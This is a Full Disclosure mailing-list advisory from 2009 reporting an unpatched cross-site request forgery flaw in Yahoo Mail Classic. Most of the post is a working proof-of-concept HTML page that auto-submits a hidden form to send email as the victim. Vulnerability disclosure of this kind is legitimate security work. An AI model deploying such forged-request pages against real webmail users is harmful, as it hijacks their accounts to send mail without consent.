Full Disclosure mailing list archives
Yahoo Mail Classic XSRF (still unpatched)
From: gaurav baruah <baruah.gaurav () gmail com>
Date: Wed, 23 Dec 2009 19:44:47 +0530
Yahoo Mail Classic XSRF (still unpatched) Discovered by - Sanjay Kumar (sanjay1519841 () gmail com) Gaurav Baruah (baruah.gaurav () gmail com) A malicious attacker can entice a user to visit a specific URL and then send emails on context of that user using XSRF. Parameters - &.rand, clean&.jsrand, acrumb, mcrumb (which are most likely tokens) are not validated during the request submission, which causes XSRF to occur. These parameters have been removed in the following HTML code, but the request still succeeds. Although a “Message Sent” page is displayed after the POST request is sent, this can be hidden by making use of an iframe to host the specified page that was previously making the XSRF request. Care has to be taken to change the following fields as required for each subsequent attack, or the attack fails due to invalid data being submitted. jsonEmails & to (both contain the recipient address) fromAddresses & defFromAddress ( both contain the source address) Start of PoC.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <html> <body><form action="http://us.mc533.mail.yahoo.com/mc/compose?" method="post" name="yahoo"> <input type="hidden" name="cmd" value="mask"> <input type="hidden" name="fromAddresses" value="{"victim () yahoo com":{"address":"victim () yahoo com","frmName":"testuser","replyTo":"","type":"default","pop":""}}"> <input type="hidden" name="defFromAddress" value="victim () yahoo com"> <input type="hidden" name="to" value="user_to_send_email_to () gmail com"> <input type="hidden" name="jsonEmails" value="{"user_to_send_email_to () gmail com":false}"> <input type="hidden" name="attachment" value=""> <input type="hidden" name="msgFlag" value="compose"> <input type="hidden" name="startMid" value=""> <input type="hidden" name="sMid" value="0"> <input type="hidden" name="pSize" value=""> <input type="hidden" name="nextMid" value=""> <input type="hidden" name="prevMid" value=""> <input type="hidden" name="fid" value="Inbox"> <input type="hidden" name="mid" value=""> <input type="hidden" name="oFid" value=""> <input type="hidden" name="oMid" value=""> <input type="hidden" name="sort" value=""> <input type="hidden" name="filterBy" value=""> <input type="hidden" name="order" value=""> <input type="hidden" name="msgID" value=""> <input type="hidden" name="ymcjs" value="1"> <input type="hidden" name="signatureAdded" value="1"> <input type="hidden" name="sUseRichText" value="dynamic"> <input type="hidden" name="sReplyToAddress" value=""> <input type="hidden" name="embstyle" value=""> <input type="hidden" name="st_desc" value=""> <input type="hidden" name="showBcc" value="false"> <input type="hidden" name="action_msg_send" value="Send"> <input type="hidden" name="cc" value=""> <input type="hidden" name="bcc" value=""> <input type="hidden" name="Subj" value="test"> <input type="hidden" name="togglePlainTxt" value="1"> <input type="hidden" name="Content" value="You have been XSRF-ed !!!"> </form> <script>document.yahoo.submit();</script> </body> </html> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo Mail Classic XSRF (still unpatched) gaurav baruah (Dec 23)